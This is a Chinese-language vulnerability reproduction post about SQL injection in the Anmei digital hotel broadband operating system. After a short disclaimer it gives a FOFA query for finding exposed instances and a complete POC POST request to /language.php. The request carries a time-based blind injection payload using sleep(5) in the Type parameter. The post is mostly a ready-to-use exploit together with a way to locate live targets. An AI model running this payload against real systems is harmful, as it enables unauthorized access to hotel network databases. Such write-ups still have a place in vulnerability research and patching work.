安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]

文章目录

  • 安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

安美数字酒店宽带运营系统存在SQL注入漏洞。

0x03 影响版本

酒店宽带运营系统

0x04 漏洞环境

FOFA语法:title=酒店宽带运营系统
安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]_第1张图片

0x05 漏洞复现

1.访问漏洞环境

安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]_第2张图片

2.构造POC

POC (POST)

POST /language.php HTTP/1.1
Host: ip:port
Connection: Keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=3n9dv7r0vl6fcvirnlvp2oh1t4; dashboroad=srgua4gv7d2jnichvtl66l1146
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)

EditStatus=1&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20

3.复现

发送数据包,进行延迟注入
安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]_第3张图片

你可能感兴趣的:(漏洞复现,1024程序员节,安全,系统安全,网络安全,sql)